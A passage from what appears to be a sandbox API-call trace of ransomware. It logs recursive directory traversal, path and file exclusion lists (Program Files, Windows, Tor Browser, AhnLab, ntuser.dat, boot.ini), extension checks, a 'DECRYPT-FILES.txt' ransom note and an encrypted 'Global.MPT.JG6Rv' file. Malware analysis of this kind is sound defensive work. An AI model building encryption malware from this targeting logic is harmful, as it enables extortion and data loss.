lpString2="sys") returned 1 [0180.621] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.621] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\") returned 67 [0180.621] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.621] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\" [0180.621] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\0a16c9.tmp" [0180.621] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.622] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.622] CloseHandle (hObject=0x0) returned 0 [0180.622] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.622] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8d940a0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0xaab0a560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaab0a560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="14", cAlternateFileName="")) returned 1 [0180.622] lstrcmpW (lpString1="14", lpString2=".") returned 1 [0180.622] lstrcmpW (lpString1="14", lpString2="..") returned 1 [0180.622] lstrcatW (in: lpString1="14", lpString2="\\" | out: lpString1="14\\") returned="14\\" [0180.622] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpString2="14\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\" [0180.622] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpSrch="\\Program Files") returned 0x0 [0180.622] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpSrch=":\\Windows") returned 0x0 [0180.622] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpSrch="\\Games\\") returned 0x0 [0180.622] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.622] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.622] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.622] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.622] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.622] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpSrch="\\All Users") returned 0x0 [0180.622] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.623] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.623] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.623] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpSrch="AhnLab") returned 0x0 [0180.623] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.623] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\") returned 70 [0180.623] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.623] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\\\0a16c9.tmp") returned 81 [0180.623] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x274 [0180.624] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\") returned 70 [0180.624] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.624] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\\\DECRYPT-FILES.txt") returned 88 [0180.624] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.625] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\") returned 70 [0180.625] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\*" [0180.625] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8d940a0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0xeec7dc00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec7dc00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0180.625] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.625] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8d940a0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0xeec7dc00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec7dc00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.625] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.625] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.625] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeec7dc00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeec7dc00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec7dc00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.625] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.625] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.625] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.625] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.625] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.625] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.625] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.625] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.625] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.625] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.625] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.625] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.626] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.626] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.626] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.626] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\") returned 70 [0180.626] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.626] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\" [0180.626] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\0a16c9.tmp" [0180.626] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.626] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.626] CloseHandle (hObject=0x0) returned 0 [0180.626] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.626] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8d940a0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0xaab7c980, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaab7c980, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0180.626] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0180.626] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0180.626] lstrcatW (in: lpString1="1033", lpString2="\\" | out: lpString1="1033\\") returned="1033\\" [0180.626] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpString2="1033\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\" [0180.626] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpSrch="\\Program Files") returned 0x0 [0180.627] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpSrch=":\\Windows") returned 0x0 [0180.627] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpSrch="\\Games\\") returned 0x0 [0180.627] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.627] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.627] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.627] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.627] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.627] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpSrch="\\All Users") returned 0x0 [0180.627] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.627] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.627] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.627] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpSrch="AhnLab") returned 0x0 [0180.627] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.627] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\") returned 75 [0180.627] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.627] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\\\0a16c9.tmp") returned 86 [0180.627] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x27c [0180.628] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\") returned 75 [0180.628] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.628] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\\\DECRYPT-FILES.txt") returned 93 [0180.628] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.628] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\") returned 75 [0180.628] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\*" [0180.628] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8d940a0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0xeeca3d60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeca3d60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0180.628] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.628] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8d940a0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0xeeca3d60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeca3d60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.629] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.629] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.629] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeeca3d60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeeca3d60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeca3d60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.629] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.629] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.629] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.629] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.629] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.629] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.629] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.629] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.629] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.629] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.629] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.629] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.629] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.629] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.629] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.629] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\") returned 75 [0180.629] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.629] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\" [0180.629] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\0a16c9.tmp" [0180.629] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.629] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.629] CloseHandle (hObject=0x0) returned 0 [0180.629] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.630] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaab0a560, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaab0a560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaab0a560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.630] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.630] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8e064c0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0x8e064c0, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0xaab56820, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x5f708, dwReserved0=0x0, dwReserved1=0x0, cFileName="Global.MPT.JG6Rv", cAlternateFileName="GLOBAL~1.JG6")) returned 1 [0180.630] lstrcmpiW (lpString1="Global.MPT.JG6Rv", lpString2="DECRYPT-FILES.txt") returned 1 [0180.630] lstrcmpiW (lpString1="Global.MPT.JG6Rv", lpString2="autorun.inf") returned 1 [0180.630] lstrcmpiW (lpString1="Global.MPT.JG6Rv", lpString2="boot.ini") returned 1 [0180.630] lstrcmpiW (lpString1="Global.MPT.JG6Rv", lpString2="desktop.ini") returned 1 [0180.630] lstrcmpiW (lpString1="Global.MPT.JG6Rv", lpString2="ntuser.dat") returned -1 [0180.630] lstrcmpiW (lpString1="Global.MPT.JG6Rv", lpString2="iconcache.db") returned -1 [0180.630] lstrcmpiW (lpString1="Global.MPT.JG6Rv", lpString2="bootsect.bak") returned 1 [0180.630] lstrcmpiW (lpString1="Global.MPT.JG6Rv", lpString2="ntuser.dat.log") returned -1 [0180.630] lstrcmpiW (lpString1="Global.MPT.JG6Rv", lpString2="thumbs.db") returned -1 [0180.630] lstrcmpiW (lpString1="Global.MPT.JG6Rv", lpString2="Bootfont.bin") returned 1 [0180.630] lstrlenW (lpString="Global.MPT.JG6Rv") returned 16 [0180.630] lstrcmpiW (lpString1="JG6Rv", lpString2="lnk") returned -1 [0180.630] lstrcmpiW (lpString1="JG6Rv", lpString2="exe") returned 1 [0180.630] lstrcmpiW (lpString1="JG6Rv", lpString2="sys") returned -1 [0180.630] lstrcmpiW (lpString1="JG6Rv", lpString2="dll") returned 1 [0180.630] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\") returned 75 [0180.630] lstrlenW (lpString="Global.MPT.JG6Rv") returned 16 [0180.630] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\" [0180.630] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpString2="Global.MPT.JG6Rv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT.JG6Rv") returned="C:\\Users\\5p5NrGJn0jS 